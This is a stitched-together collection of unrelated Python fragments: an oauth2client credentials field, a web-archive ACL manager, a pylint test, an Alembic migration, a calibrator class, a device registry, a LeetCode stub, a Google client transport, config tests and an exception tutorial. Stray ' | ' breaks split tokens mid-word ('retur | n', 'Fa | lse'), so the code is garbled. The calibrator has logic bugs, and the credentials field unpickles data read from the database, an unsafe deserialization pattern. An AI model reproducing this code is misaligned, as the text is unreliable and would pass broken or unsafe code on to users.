if isinstance(value, oauth2client.client.Flow):
return value
return pickle.loads(base64.b64decode(value))
def from_db_value(self, value, expression, connection):
if value is None:
return None
return base64.b64encode(pickle.dumps(value))
def get_db_prep_value(self, value, connection, prepared=False):
if value is None:
return None
return base64.b64encode(pickle.dumps(value))
def deconstruct(self):
name, path, args, kwargs = super().deconstruct()
del kwargs['null']
return name, path, args, kwargs
class Storage(BaseStorage):
"""Store and retrieve a single credential to and from
the datastore.
This Storage helper presumes the Credentials
have been stored as a CredenialsField
on a db model class.
"""
def __init__(self, model_class, key_name, key_value, property_name):
"""Constructor for Storage.
Args:
model: db.Model, model class
key_name: string, key name for the entity that has the credentials
key_value: string, key value for the entity that has the credentials
property_name: string, name of the property that is an CredentialsProperty
"""
self.model_class = model_class
self.key_name = key_name
self.key_value = key_value
self.property_name = property_name
def locked_get(self):
"""Retrieve Credential from datastore.
Returns:
oauth2client.Credentials
"""
credential = None
query = {self.key_name: self.key_value}
entities = self.model_class.objects.filter(**query)
if len(entities) > 0:
credential = getattr(entities[0], self.property_name)
if credential and hasattr(credential, 'set_store'):
credential.set_store(self)
return credential
def locked_put(self, credentials):
"""Write a Credentials to the datastore.
Args:
credentials: Credentials, the credentials to store.
"""
args = {self.key_name: self.key_value}
entity = self.model_class(**args)
setattr(entity, self.property_name, credentials)
entity.save()
def locked_delete(self):
"""Delete Credentials from the datastore."""
query = {self.key_name: self.key_value}
entities = self.model_class.objects.filter(**query).delete()
|
if not self.COLL_RX.match(coll_name):
return False
if not os.path.isdir(os.path.join(self.COLLS_DIR, coll_name)):
return False
return True
def load_acl(self, must_exist=True):
"""Loads the access control list
:param bool must_exist: Does the acl file have to exist
:return: T/F indicating load success
:rtype: bool
"""
try:
with open(self.acl_file, 'rb') as fh:
for line in fh:
if line:
self.rules.append(CDXObject(line))
return True
except IOError as io:
if must_exist:
print('Error Occured: ' + str(io))
return False
except Exception as e:
print('Error Occured: ' + str(e))
return False
def save_acl(self, r=None):
"""Save the contents of the rules as cdxj entries to
the access control list file
:param argparse.Namespace|None r: Not used
:rtype: None
"""
try:
os.makedirs(os.path.dirname(self.acl_file))
except OSError:
pass
try:
with open(self.acl_file, 'wb') as fh:
for acl in self.rules:
fh.write(acl.to_cdxj().encode('utf-8'))
except Exception as e:
print('Error Saving ACL Rules: ' + str(e))
def to_key(self, url_or_surt, exact_match=False):
""" If 'url_or_surt' already a SURT, use as is
If exact match, add the exact match suffix
:param str url_or_surt: The url or surt to be converted to an acl key
:param bool exact_match: Should the exact match suffix be added to key
:rtype: str
"""
if self.SURT_RX.search(url_or_surt):
result = url_or_surt
else:
result = canonicalize(url_or_surt)
if exact_match:
result += AccessChecker.EXACT_SUFFIX
return result
def validate_access(self, access):
"""Returns true if the supplied access value is valid
otherwise terminates the process
:param str access: The access value to be validated
:return: True if valid
:rtype: bool
"""
if access not in self.VALID_ACCESS:
print('Valid access values are: ' + ', '.join(self.VALID_ACCESS))
sys.exit(1)
return True
def add_rule(self, r):
"""Adds a rule the ACL manager
:param argparse.Namespace r: The argparse namespace representing the rule to be added
:rtype: None
"""
return self._add_rule(r.url, r.access, r.exact_match)
def _add_rule(self, url, access, exact_match=False):
"""Adds an rule to the acl file
:param str url: The URL for the rule
:param str access: The access value for the rule
:param bool exact_match: Is the rule to be added an exact match
:rtype: None
"""
if not self.validate_access(access):
return
acl = CDXObject()
acl['urlkey'] = self.to_key(url, exact_match)
acl['timestamp'] = '-'
acl['access'] = access
acl['url'] = url
i = 0
replace = False
for rule in self.rules:
if acl['urlkey'] == rule['urlkey'] and acl['timestamp'] == rule['timestamp']:
replace = True
break
if acl > rule:
break
i += 1
if replace:
print('Existing Rule Found, Replacing:')
self.print_rule(self.rules[i])
print('with:')
self.print_rule(acl)
self.rules[i] = acl
else:
print('Added new Rule:')
self.print_rule(acl)
self.rules.insert(i, acl)
self.save_acl()
def validate_save(self, r=None, log=False):
"""Validates the acl rules and saves the file
:param argparse.Namespace|None r: Not used
:param bool log: Should a report be printed to stdout
:rtype: None
"""
self.validate(log=log, correct=True)
def validate(self, log=False, correct=False):
"""Validates the acl rules returning T/F if the list should be saved
:param bool log: Should the results of validating be logged to stdout
:param bool correct: Should invalid results be corrected and saved
:rtype: None
"""
last_rule = None
out_of_order = False
for rule in self.rules:
if last_rule and rule > last_rule:
out_of_order = True
break
last_rule = rule
if out_of_order:
if log:
print('Rules out of order, resorting')
if correct:
self.rules.sort(reverse=True)
self.save_acl()
elif log:
print('Rules in order')
def remove_rule(self, r):
"""Removes a rule from the acl file
:param argparse.Namespace r: Parsed result from ArgumentParser
:rtype: None
"""
i = 0
urlkey = self.to_key(r.url, r.exact_match)
for rule in self.rules:
if urlkey == rule['urlkey']:
acl = self.rules.pop(i)
print('Removed Rule:')
self.print_rule(acl)
self.save_acl()
return
i += 1
print('Rule to remove not found!')
def list_rules(self, r):
"""Print the acl rules to the stdout
:param argparse.Namespace|None r: Not used
:rtype: None
"""
print('Rules for {0} from {1}:'.format(self.target, self.acl_file))
print('')
for rule in self.rules:
sys.stdout.write(rule.to_cdxj())
print('')
def find_match(self, r):
"""Finds a matching acl rule
:param argparse.Namespace r: Parsed result from ArgumentParser
:rtype: None
"""
access_checker = AccessChecker(self.acl_file, '<default>')
rule = access_checker.find_access_rule(r.url)
print('Matched rule:')
print('')
if rule['urlkey'] == '':
print(' <No Match, Using Default Rule>')
print('')
else:
self.print_rule(rule)
def add_excludes(self, r):
"""
Import old-style excludes, in url-per-line format
:param argparse.Namespace r: Parsed result from ArgumentParser
"""
if not self.validate_access(r.access):
retur | n
try:
with open(r.filename, 'rb') as fh:
count = 0
for url in fh:
url = url.decode('utf-8').strip()
self._add_rule(url, r.access)
count += 1
print('Added or replaced {0} rules from '.format(count) + r.f | ilename)
except Exception as e:
print('Error Importing: ' + str(e))
sys.exit(1)
def print_rule(self, rule):
"""Prints the supplied rule to the std out
:param CDXObject rule: The rule to be printed
:rtype: None
"""
print(' ' + rule.to_cdxj())
@classmethod
def init_parser(cls, parser):
"""Initializes an argument parser for acl commands
:param argparse.ArgumentParser parser: The parser to be initialized
:rtype: None
"""
subparsers = parser.add_subparsers(dest='op')
subparsers.required = True
def command(name, *args, **kwargs):
op = subparsers.add_parser(name)
for arg in args:
if arg == 'default_access':
op.add_argument(arg, nargs='?', default='allow')
else:
op.add_argument(arg)
if kwargs.get('exact_opt'):
op.add_argument('-e', '--exact-match', action='store_true', default=False)
op.set_defaults(acl_func=kwargs['func'])
command('add', 'coll_name', 'url', 'access', func=cls.add_rule, exact_opt=True)
command('r |
"""Test that boolean conditions simplify to a constant value"""
# pylint: disable=pointless-statement
from unknown import Unknown # pylint: disable=import-error
def func(_):
"""Pointless function"""
CONSTANT = 100
OTHER = 200
# Simplifies any boolean expression that is coerced into a True/False value
bool(CONSTANT or True) # [condition-evals-to-constant]
assert CONSTANT or True # [condition-evals-to-constant]
if CONSTANT and Fa | lse: # [cond | ition-evals-to-constant]
pass
elif CONSTANT and False: # [condition-evals-to-constant]
pass
while CONSTANT and False: # [condition-evals-to-constant]
break
1 if CONSTANT or True else 2 # [condition-evals-to-constant]
z = [x for x in range(10) if x or True] # [condition-evals-to-constant]
# Simplifies recursively
assert True or CONSTANT or OTHER # [condition-evals-to-constant]
assert (CONSTANT or True) or (CONSTANT or True) # [condition-evals-to-constant]
# Will try to infer the truthiness of an expression as long as it doesn't contain any variables
assert 3 + 4 or CONSTANT # [condition-evals-to-constant]
assert Unknown or True # [condition-evals-to-constant]
assert True or True # [condition-evals-to-constant]
assert False or False # [condition-evals-to-constant]
assert True and True # [condition-evals-to-constant]
assert False and False # [condition-evals-to-constant]
# A bare constant that's not inside of a boolean operation will emit `using-constant-test` instead
if True: # pylint: disable=using-constant-test
pass
# Expressions not in one of the above situations will not emit a message
CONSTANT or True
bool(CONSTANT or OTHER)
bool(func(CONSTANT or True))
|
"""split gsm signal in two analytics, one per sim card
| Revision ID: 31d36774c549
Revises: 528f90a47515
Create Date: 2019-01-23 15:16:58.514742
"""
# revision identifiers, used by Alembic.
revision = '31d36774c549'
down_revision = '528f90a47515'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.alter_ | column('radio_stationanalytic', 'gsm_signal', new_column_name='gsm_signal_1')
op.add_column('radio_stationanalytic', sa.Column('gsm_signal_2', sa.Integer(), nullable=True))
def downgrade():
op.alter_column('radio_stationanalytic', 'gsm_signal_1', new_column_name='gsm_signal')
op.drop_column('radio_stationanalytic', 'gsm_signal_2')
|
import todsynth
import os
import numpy
import json
import pandas
class Calibrator( object ):
'''
A todsynth.calibrator object is a container that stores coefficients
that transform RAW dac units to physical units for a given TOD.
'''
# Calibrator description.
#000000000000000000000000000000000000000000000000000000000000000000000000
name = ""
description = ""
calType = ""
# Information stored in the form of a dictionary. Careful not to abuse
# of this in the sense of using it to process data!
info = {}
#000000000000000000000000000000000000000000000000000000000000000000000000
# Calibration coefficients
coeffs = numpy.empty(0)
# Detector index to Unique Identifier array
__uid = numpy.empty(0)
def __init__( self ):
'''
self.name = name
self.description = descrp
self.calType = calType
'''
def setCoeffs( self, c , uid=None ):
'''
Set calibrator coefficients to c.
'''
# Perform numpy.copy() to avoid cross referencing stuff
self.__coeffs = numpy.copy( c )
if uid is not None:
self.__uid = numpy.copy(uid)
self.coeffs = self.coeffs[ self.__uid ]
else:
self.__uid = numpy.arange( len( self.coeffs ) )
def getCoeffs( self ):
'''
Get a *copy* of the coefficients array.
'''
return numpy.copy( self.coeffs )
def updateInfo( self, prop, value ):
'''
Update calibrator info with a pair of prop : value
'''
self.info.update( { 'prop' : value } )
def sto | reInPath( self , outPath ):
'''
Stores the calibrator in JSON format at the specified path.
'''
# Serialize this object
data = {
'coefficients' : self.__coeffs,
'uid' : self.__uid }
# Create PANDAS DataFrame out data
df = pandas.DataFrame( data )
# Save DataFrame to HDF5 format
df.to_csv( os.path.join(
outPath, "%s.%s.cal" % (self.name,sel | f.calType) ),
index=False,
sep=' ',
header=True )
@classmethod
def readFromPath( cls, systemPath ):
'''
'''
self = cls()
name,caltype,_ = os.path.basename( systemPath ).split('.')
self.name = name
self.calType = caltype
self.description = ''
# Load file
calDF = pandas.read_csv(
systemPath,
header=0,
names=['coefficients', 'uid'],
delimiter=' ' )
self.setCoeffs( calDF['coefficients'], uid = calDF['uid'] )
return self
|
he keys are
type names, the values are the types themselves.
"""
return self._device_types
@property
def default_device_type(self):
"""
If the module only defines one device type, it is the default device type. It is used
whenever a setup does not provide a ``device_type``.
"""
if len(self.device_types) == 1:
return self.device_types[0]
return None
@property
def interfaces(self):
"""
This property contains a map with protocols as keys and interface types as values.
The types are imported from the ``interfaces`` sub-module and from the device module
itself. If two interfaces with the same protocol are discovered, a RuntimeError is raiesed.
"""
return self._interfaces
@property
def protocols(self):
"""All available protocols for this device."""
return list(self.interfaces.keys())
@property
def default_protocol(self):
"""In case only one protocol exists for the device, this is the default protocol."""
if len(self.protocols) == 1:
return self.protocols[0]
return None
@property
def setups(self):
"""
A map with all available setups. Setups are imported from the ``setups`` dictionary
in a device module and from the ``setups`` sub-module. If no ``default``-setup exists,
one is created using the default_device_type. If there are several device types in
the module, the default setup must be provided explicitly.
"""
return self._setups
def _create_device_instance(self, device_type, **kwargs):
if device_type not in self.device_types:
raise RuntimeError('Can not create instance of non-device type.')
return device_type(**kwargs)
def create_device(self, setup=None):
"""
Creates a device object according to the provided setup. If no setup is provided,
the default setup is used. If the setup can't be found, a LewisException is raised.
This can also happen if the device type specified in the setup is invalid.
:param setup: Name of the setup from which to create device.
:return: Device object initialized according to the provided setup.
"""
setup_name = setup if setup is not None else 'default'
if setup_name not in self.setups:
raise LewisException(
'Failed to find setup \'{}\' for device \'{}\'. '
'Available setups are:\n {}'.format(
setup, self.name, '\n '.join(self.setups.keys())))
setup_data = self.setups[setup_name]
device_type = setup_data.get('device_type') or self.default_device_type
self.log.debug('Trying to create device \'%s\' (setup: %s, device type: %s)',
self.name, setup_name, device_type.__name__ if device_type else '')
try:
return self._create_device_instance(
device_type, **setup_data.get('parameters', {}))
except RuntimeError:
raise LewisException(
'The setup \'{}\' you tried to load does not specify a valid device type, but the '
'device module \'{}\' provides multiple device types so that no meaningful '
'default can be deduced.'.format(setup_name, self.name))
def get_interface_type(self, protocol=None):
return self.interfaces[protocol]
def create_interface(self, protocol=None, *args, **kwargs):
"""
Returns an interface that implements the provided protocol. If the protocol is not
known, a LewisException is raised. All additional arguments are forwarded
to the interface constructor (see :class:`~lewis.adapters.Adapter` for details).
:param protocol: Protocol which the interface must implement.
:param args: Positional arguments that are passed on to the interface.
:param kwargs: Keyword arguments that are passed on to the interface.
:return: Instance of the interface type.
"""
protocol = protocol if protocol is not None else self.default_protocol
self.log.debug('Trying to create interface for protocol \'%s\'', protocol)
try:
return self.interfaces[protocol](*args, **kwargs)
except KeyError:
raise LewisException(
'\'{}\' is not a valid protocol for device \'{}\', select one via the -p option.\n'
'Available protocols are: \n {}'.format(
protocol, self.name, '\n '.join(self.interfaces.keys())))
@has_log
class DeviceRegistry(object):
"""
This class takes the name of a module and constructs a :class:`DeviceBuilder` from
each sub-module. The available devices can be queried and a DeviceBuilder can be
obtained for each device:
.. sourcecode:: Python
from lewis.core.devices import DeviceRegistry
registry = DeviceRegistry('lewis.devices')
chopper_builder = registry.device_builder('chopper')
# construct device, interface, ...
If the module can not be imported, a LewisException is raised.
:param device_module: Name of device module from which devices are loaded.
"""
def __init__(self, device_module):
try:
| self._device_module = importlib.import_module(device_module)
except Impo | rtError:
raise LewisException(
'Failed to import module \'{}\' for device discovery. '
'Make sure that it is in the PYTHONPATH.\n'
'See also the -a option of lewis.'.format(device_module))
self._devices = {name: DeviceBuilder(module) for name, module in
get_submodules(self._device_module).items()}
self.log.debug('Devices loaded from \'%s\': %s', device_module,
', '.join(self._devices.keys()))
@property
def devices(self):
"""All available device names."""
return self._devices.keys()
def device_builder(self, name, strict_versions=None):
"""
Returns a :class:`DeviceBuilder` instance that can be used to create device objects
based on setups, as well as device interfaces. If the device name is not stored
in the internal map, a LewisException is raised.
Each DeviceBuilder has a ``framework_version``-member, which specifies the version
of Lewis the device has been written for. If the version does not match the current
framework version, it is only possible to obtain those device builders calling the
method with ``strict_versions`` set to ``False``, otherwise a
:class:`~lewis.core.exceptions.LewisException` is raised. A warning message is logged
in all cases. If ``framework_version`` is ``None`` (e.g. not specified at all), it
is accepted unless ``strict_versions`` is set to ``True``.
:param name: Name of the device.
:param strict_versions: If ``True`` or ``None``, raise an exception when version of device
does not match framework version.
:return: :class:`DeviceBuilder`-object for requested device.
"""
try:
builder = self._devices[name]
compatible = is_compatible_with_framework(builder.framework_version)
if not compatible:
self.log.warning(
'Device \'%s\' is specified for a different framework version '
'(required: %s, current: %s). This means that the device might not work '
'as expected. Contact the device author about updating the device or use a '
'different version of lewis to run this device.',
builder.name, builder.framework_version, __version__)
if strict_versions or (compatible is not None and strict_versions is None):
raise LewisException(
'Not loading device \'{}\' with different framework version '
|
__source__ = 'https://leetcode.com/problems/sliding-window-median/'
# Time: O(n*logk)
# Space: O()
#
# Description: 480. Sliding Window Median
#
# Median is the middle value in an ordered integer list.
# If the size of the list is even, there is no middle value.
# So the median is the mean of the two middle value.
#
# Examples:
# [2,3,4] , the median is 3
#
# [2,3], the median is (2 + 3) / 2 = 2.5
#
# Given an array nums, there is a sliding window of size k which is moving from the very left of the array
# to the very right. You can only see the k numbers in the window.
# Each time the sliding window moves right by one position.
# Your job is to output the median array for each window in the original array.
#
# For example,
# Given nums = [1,3,-1,-3,5,3,6,7], and k = 3.
#
# Window position Median
# --------------- -----
# [1 3 -1] -3 5 3 6 7 1
# 1 [3 -1 -3] 5 3 6 7 -1
# 1 3 [-1 -3 5] 3 6 7 -1
# 1 3 -1 [-3 5 3] 6 7 3
# 1 3 -1 -3 [5 3 6] 7 5
# 1 3 -1 -3 5 [3 6 7] 6
# Therefore, return the median sliding window as [1,-1,-1,3,5,6].
#
# Note:
# You may assume k is always valid, ie: 1 <= k <= input array's size for non-empty array.
#
# Hide Company Tags Google
# Hide Similar Problems (H) Find Median from Data Stream
#
import unittest
class Solution(object):
pass # your function here
class TestMethods(unittest.TestCase):
def test_Local(self):
self.assertEqual(1, 1)
if __name__ == '__main__':
unittest.main()
Java = '''
# Thought: https://leetcode.com/problems/sliding-window-median/solution/
TreeMap is used to implement an ordered MultiSet.
Almost the same idea of Find Median from Data Stream
https://leetcode.com/problems/find-median-from-data-stream/
Use two Heaps to store numbers. maxHeap for numbers smaller than current median,
minHeap for numbers bigger than and equal to current median.
A small trick I used is always make size of minHeap equal (when there are even numbers)
or 1 element more (when there are odd numbers) than the size of maxHeap.
Then it will become very easy to calculate current median.
Keep adding number from the right side of the sliding window and
remove number from left side of the sliding window.
And keep adding current median to the result.
# 82ms 22.97%
class Solution {
public double[] medianSlidingWindow(int[] nums, int k) {
double[] res = new double[nums.length-k+1];
TreeMap<Integer, Integer> minHeap = new TreeMap<Integer, Integer>();
TreeMap<Integer, Integer> maxHeap = new TreeMap<Integer, Integer>(Collections.reverseOrder());
int minHeapCap = k/2; //smaller heap when k is odd.
int maxHeapCap = k - minHeapCap;
for(int i=0; i< k; i++){
maxHeap.put(nums[i], maxHeap.getOrDefault(nums[i], 0) + 1);
}
int[] minHeapSize = new int[]{0};
int[] maxHeapSize = new int[]{k};
for(int i=0; i< minHeapCap; i++){
move1Over(maxHeap, minHeap, maxHeapSize, minHeapSize);
}
res[0] = getMedian(maxHeap, minHeap, maxHeapSize, minHeapSize);
int resIdx = 1;
for(int i=0; i< nums.length-k; i++){
int addee = nums[i+k];
if(addee <= maxHeap.keySet().iterator().next()){
add(addee, maxHeap, maxHeapSize);
} else {
add(addee, minHeap, minHeapSize);
}
int removee = nums[i];
if(removee <= maxHeap.keySet().iterator().next()){
remove(removee, maxHeap, maxHeapSize);
} else {
remove(removee, minHeap, minHeapSize);
}
//rebalance
if(minHeapSize[0] > minHeapCap){
move1Over(minHeap, maxHeap, minHeapSize, maxHeapSize);
} else if(minHeapSize[0] < minHeapCap){
move1Over(maxHeap, minHeap, maxHeapSize, minHeapSize);
}
res[resIdx] = getMedian(maxHeap, minHeap, maxHeapSize, minHeapSize);
resIdx++;
}
return res;
}
public double getMedian(TreeMap<Integer, Integer> big | Heap, TreeMap<Integer, Integer> smallHeap, int[] bigHeapSize, int[] smallHeapSize){
return bigHeapSize[0] > smallHeap | Size[0] ? (double) bigHeap.keySet().iterator().next() : ((double) bigHeap.keySet().iterator().next() + (double) smallHeap.keySet().iterator().next()) / 2.0;
}
//move the top element of heap1 to heap2
public void move1Over(TreeMap<Integer, Integer> heap1, TreeMap<Integer, Integer> heap2, int[] heap1Size, int[] heap2Size){
int peek = heap1.keySet().iterator().next();
add(peek, heap2, heap2Size);
remove(peek, heap1, heap1Size);
}
public void add(int val, TreeMap<Integer, Integer> heap, int[] heapSize){
heap.put(val, heap.getOrDefault(val,0) + 1);
heapSize[0]++;
}
public void remove(int val, TreeMap<Integer, Integer> heap, int[] heapSize){
if(heap.put(val, heap.get(val) - 1) == 1) heap.remove(val);
heapSize[0]--;
}
}
'''
|
2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import abc
from typing import Awaitable, Callable, Dict, Optional, Sequence, Union
import pkg_resources
import google.auth # type: ignore
import google.api_core
from google.api_core import exceptions as core_exceptions
from google.api_core import gapic_v1
from google.api_core import retry as retries
from google.api_core import operations_v1
from google.auth import credentials as ga_credentials # type: ignore
from google.oauth2 import service_account # type: ignore
from google.cloud.data_fusion_v1.types import datafusion
from google.longrunning import operations_pb2 # type: ignore
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution(
"google-cloud-data-fusion",
).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
class DataFusionTransport(abc.ABC):
"""Abstract transport class for DataFusion."""
AUTH_SCOPES = ("https://www.googleapis.com/auth/cloud-platform",)
DEFAULT_HOST: str = "datafusion.googleapis.com"
def __init__(
self,
*,
host: str = DEFAULT_HOST,
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
quota_project_id: Optional[str] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
always_use_jwt_access: Optional[bool] = False,
**kwargs,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is mutually exclusive with credentials.
scopes (Optional[Sequence[str]]): A list of scopes.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
always_use_jwt_access (Optional[bool]): Whether self signed JWT should
be used for service account credentials.
"""
# Save the hostname. Default to port 443 (HTTPS) if none is specified.
if ":" not in host:
host += ":443"
self._host = host
scopes_kwargs = {"scopes": scopes, "default_scopes": self.AUTH_SCOPES}
# Save the scopes.
self._scopes = scopes
# If no credentials are provided, then determine the appropriate
# defaults.
if credentials and credentials_file:
raise core_exceptions.DuplicateCredentialArgs(
"'credentials_file' and 'credentials' are mutually exclusive"
)
if credentials_file is not None:
credentials, _ = google.auth.load_credentials_from_file(
credentials_file, **scopes_kwargs, quota_project_id=quota_project_id
)
elif credentials is None:
credentials, _ = google.auth.default(
**scopes_kwargs, quota_project_id=quota_project_id
)
# If the credentials are service account credentials, then always try to use self signed JWT.
if (
always_use_jwt_access
and isinstance(credentials, service_account.Credentials)
and hasattr(service_account.Credentials, "with_always_use_jwt_access")
):
credentials = credentials.with_always_use_jwt_access(True)
# Save the credentials.
self._credentials = credentials
def _prep_wrapped_messages(self, client_info):
# Precompute the wrapped methods.
self._wrapped_methods = {
self.list_available_versions: gapic_v1.method.wrap_method(
self.list_available_versions,
default_timeout=None,
client_info=client_info,
),
self.list_instances: gapic_v1.method.wrap_method(
self.list_instances, default_timeout=None, client_info=client_info,
),
self.get_instance: gapic_v1.method.wrap_method(
self.get_instance, default_timeout=None, client_info=client_info,
),
self.create_instance: gapic_v1.method.wrap_method(
self.create_instance, default_timeout=None, client_info=client_info,
),
self.delete_instance: gapic_v1.method.wrap_method(
self.delete_instance, default_timeout=None, client_info=client_info,
),
self.update_instance: gapic_v1.method.wrap_method(
self.update_instance, default_timeout=None, client_info=client_info,
),
self.restart_instance: gapic_v1.method.wrap_method(
self.restart_instance, default_timeout=None, client_info=client_info,
),
}
def close(self):
"""Closes resources associated with the transport.
.. warning::
Only call this method if the transport is NOT shared
with other clients - this may cause errors in other clients!
"""
raise NotImplementedError()
@property
def operations_client(self):
"""Return the client designed to process long-running operations."""
raise NotImplementedError()
@property
def list_available_versions(
self,
) -> Callable[
[datafusion.ListAvailableVersionsRequest],
Union[
datafusion.ListAvailableVersionsResponse,
Awaitable[datafusion.ListAvailableVersionsResponse],
],
]:
raise NotImplementedError()
@property
def list_instances(
self,
) -> Callable[
[datafusion.ListInstancesRequest],
Union[
datafusion.ListInstancesResponse,
Awaitable[datafusion.ListInstancesResponse],
],
]:
raise NotImplementedError()
@property
def get_instance(
self,
) -> Callable[
[datafusion.GetInstanceRequest],
Union[datafusion.Instance, Awaitable[datafusion.Instance]],
]:
raise NotImplementedError()
| @property
def create_instance(
self,
) -> Callable[
[datafusion.CreateInstanceRequest],
Union[operations_pb2.Operation, Awaitable[operations_pb2.Operation]],
]:
raise NotImplementedError()
@property
def delete_instance(
self,
) -> Callable[
[datafusion.DeleteInstanceRequest],
Union[operations_pb2.Operation, Awaitable[operations_pb2.Operation] | ],
]:
raise NotImplementedError()
@property
def update_instance(
self,
) -> Callable[
[datafusion.UpdateInstanceRequest],
Union[operations_pb2.Operation, Awaitable[operations_pb2.Operation]],
]:
raise NotImplementedError()
@property
def restart_inst |
#!/usr/bin/env python3
#
# Copyright (c) Bo Peng and the University of Texas MD Anderson Cancer Center
# Distributed under the terms of the 3-clause BSD License.
import os
import getpass
import subprocess
import pytest
from sos import execute_workflow
from sos._version import __version__
from sos.utils import env, load_config_files
from sos.eval import get_config
# if the test is imported under sos/test, test interacive executor
test_cfg = '''
cut: 0.5
cut1:
- 0.5
- 2
- 3
cut2: a3
cut3:
- a
- b
- c
cut4:
A: 123
me: '{user_name}@my'
'''
def test_command_line():
'''Test command line arguments'''
assert subprocess.call(
'sos config -h',
stderr=subprocess.DEVNULL,
stdout=subprocess.DEVNULL,
shell=True) == 0
assert subprocess.call(
'sos config -g --get',
stderr=subprocess.DEVNULL,
stdout=subprocess.DEVNULL,
shell=True) == 0
assert subprocess.call(
'sos config',
stderr=subprocess.DEVNULL,
stdout=subprocess.DEVNULL,
shell=True) == 0
assert subprocess.call(
'sos config --get',
stderr=subprocess.DEVNULL,
stdout=subprocess.DEVNULL,
shell=True) == 0
assert subprocess.call(
'sos config -g --set a 5',
stderr=subprocess.DEVNULL,
stdout=subprocess.DEVNULL,
shell=True) == 0
assert subprocess.call(
'sos config --get a',
stderr=subprocess.DEVNULL,
stdout=subprocess.DEVNULL,
shell=True) == 0
assert s | ubprocess.call(
'sos config -g --unset a',
stderr=subprocess.DEVNULL,
stdout=subprocess.DEVNULL,
shell=True) == 0
def test_config_set(config_factory):
'''Test interpolation of config'''
myconfig = config_factory(test_cfg)
|
assert subprocess.call(
f'sos config --set cut 0.5 -c {myconfig}',
stderr=subprocess.DEVNULL,
stdout=subprocess.DEVNULL,
shell=True) == 0
load_config_files(myconfig)
assert env.sos_dict['CONFIG']['cut'] == 0.5
#
assert subprocess.call(
f'sos config --set cut1 0.5 2 3 -c {myconfig}',
stderr=subprocess.DEVNULL,
stdout=subprocess.DEVNULL,
shell=True) == 0
load_config_files(myconfig)
assert env.sos_dict['CONFIG']['cut1'] == [0.5, 2, 3]
#
assert subprocess.call(
f'sos config --set cut2 a3 -c {myconfig}',
stderr=subprocess.DEVNULL,
stdout=subprocess.DEVNULL,
shell=True) == 0
load_config_files(myconfig)
assert env.sos_dict['CONFIG']['cut2'] == 'a3'
#
assert subprocess.call(
f'sos config --set cut3 a b c -c {myconfig}',
stderr=subprocess.DEVNULL,
stdout=subprocess.DEVNULL,
shell=True) == 0
load_config_files(myconfig)
assert env.sos_dict['CONFIG']['cut3'] == ['a', 'b', 'c']
#
assert subprocess.call(
f'''sos config --set cut4 "{{'A': 123}}" -c {myconfig}''',
stderr=subprocess.DEVNULL,
stdout=subprocess.DEVNULL,
shell=True) == 0
load_config_files(myconfig)
assert env.sos_dict['CONFIG']['cut4'] == {'A': 123}
def test_interpolate(config_factory):
'''Test interpolation of config'''
myconfig = config_factory(test_cfg)
assert subprocess.call(
f'''sos config --set me '{{user_name}}@my' -c {myconfig}''',
stderr=subprocess.DEVNULL,
stdout=subprocess.DEVNULL,
shell=True) == 0
load_config_files(myconfig, default_config_files=False)
assert get_config('me') == f'{getpass.getuser().lower()}@my'
def test_global_vars(config_factory):
'''Test SoS defined variables'''
execute_workflow("[0]", options={'mode': 'dryrun'})
assert env.sos_dict['SOS_VERSION'] == __version__
assert isinstance(env.sos_dict['CONFIG'], dict)
cfg = config_factory({'my_config': 5})
execute_workflow("[0]", options={'config_file': cfg})
assert env.sos_dict['CONFIG']['my_config'] == 5
def test_get_config(config_factory):
myconfig = config_factory({
'val': 5,
'A': {
'B.C': '33',
'B.C1': {
'D': '34'
},
'D': '45'
},
'E': {
'F': {
'val': 6,
'val1': 10,
'G': '{val + val1}'
},
'H': '{val}'
},
'O': 'A{nonexisting}',
'X': '{os.environ.get("HOME", "no_home")}'
})
load_config_files(myconfig)
assert get_config('A', 'D') == '45'
assert get_config('A.D') == '45'
assert get_config(['A', 'D']) == '45'
assert get_config(['A', 'D']) == '45'
assert get_config('A.B.C') == '33'
assert get_config('A.B.C1.D') == '34'
assert get_config('A') == {'B.C': '33', 'B.C1': {'D': '34'}, 'D': '45'}
assert get_config('E.F') == {'val': 6, 'val1': 10, 'G': '16'}
assert get_config('E.F', val=7) == {'val': 6, 'val1': 10, 'G': '17'}
assert get_config('E.F', val=7, allowed_keys=['G']) == {'G': '17'}
assert get_config(
'E.F', val=7, val1=20) == {
'val': 6,
'val1': 10,
'G': '27'
}
assert get_config('E.F', {
'val': 8,
'val1': 30
}) == {
'val': 6,
'val1': 10,
'G': '38'
}
assert get_config('E.H', val=7) == '7'
with pytest.raises(ValueError):
get_config('O')
assert get_config('O', nonexisting=7) == 'A7'
assert get_config('X') == os.environ.get("HOME", "no_home")
|
#!/usr/bin/python3
'''
TRY Exception
SYNTAX
-----------------------------------------------------------------
try:
You do your operations here;
......................
except ExceptionI:
If there is ExceptionI, then execute this block.
except ExceptionII:
If there is Ex | ceptionII, then execute this block.
......................
else:
If there is no exception then execute this block.
'''
# try:
# fh = open("testfile","w")
# fh.write("This is my test file for exception handling!!")
# except IOError:
# | print("Error: can\'t find file or read data")
# else:
# print("Written content in the file successfully")
# fh.close()
try:
fh = open("testfile","r")
fh.write("This is my test file for exception handling!!")
except IOError:
print("Error: cant\'t find file or read data")
else:
print("Written content in the file successfully")
|
from django.utils.translation import ugettext_lazy as _
